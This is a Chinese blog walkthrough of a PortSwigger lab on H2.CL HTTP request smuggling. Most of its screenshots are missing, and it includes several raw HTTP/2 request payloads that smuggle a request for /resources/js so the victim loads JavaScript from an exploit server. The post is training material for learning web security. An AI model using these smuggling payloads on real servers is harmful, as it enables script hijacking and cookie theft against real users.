某不知名博客
carsaid
2024-01-24
目录

从业者-高级请求走私-H2.CL请求走私

# 实验室:H2.CL请求走私

# 题目

此实验室容易受到请求走私的攻击,因为前端服务器会降级 HTTP/2 请求,即使这些请求的长度不一致。

若要解决实验室问题,请执行请求走私攻击,使受害者的浏览器从漏洞利用服务器加载并执行恶意 JavaScript 文件,调用alert(document.cookie)。受害用户每 10 秒访问一次主页。

提示

  • 解决此实验需要用到我们在前面的 HTTP 请求走私材料 (opens new window)中介绍的技术。
  • 你需要在受害者的浏览器导入 JavaScript 资源之前立即毒害连接。否则,它虽然会从漏洞利用服务器获取你的有效载荷,但不会执行它。你可能需要重复攻击多次,然后才能找到正确的时机。

实验室-从业者

H2.CL请求走私 >>

- name: 实验室-从业者
  desc: H2.CL请求走私 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-cl-request-smuggling
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实操

(目前只有图,文字后面有时间补)

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image Not Found Image

/resources/js/analyticsFetcher.js

Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image 
POST / HTTP/2
Host: ...
Content-Length: 0

GET /404 HTTP/1.1
Foo: x
1
2
3
4
5
6
Not Found Image Not Found Image Not Found Image

/resources/js

Not Found Image 
GET /resources/js HTTP/2
Host: <受害域>:123456@<漏洞利用服务器>
1
2
3
4
Not Found Image Not Found Image 
POST / HTTP/2
Host: ...
Content-Length: 0

GET /resources/js HTTP/1.1
Host: <受害域>:123456@<漏洞利用服务器>
Content-Length: 100

x=
1
2
3
4
5
6
7
8
9
Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image Not Found Image 
POST / HTTP/2
Host: ...
Content-Length: 0

GET /resources/js HTTP/1.1
Host: <漏洞利用服务器>
Content-Length: 100

x=
1
2
3
4
5
6
7
8
9
Not Found Image Not Found Image Not Found Image
编辑 (opens new window)
专家-利用请求走私-执行Web缓存欺骗
从业者-响应队列投毒-H2.TE请求走私

从业者-响应队列投毒-H2.TE请求走私

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License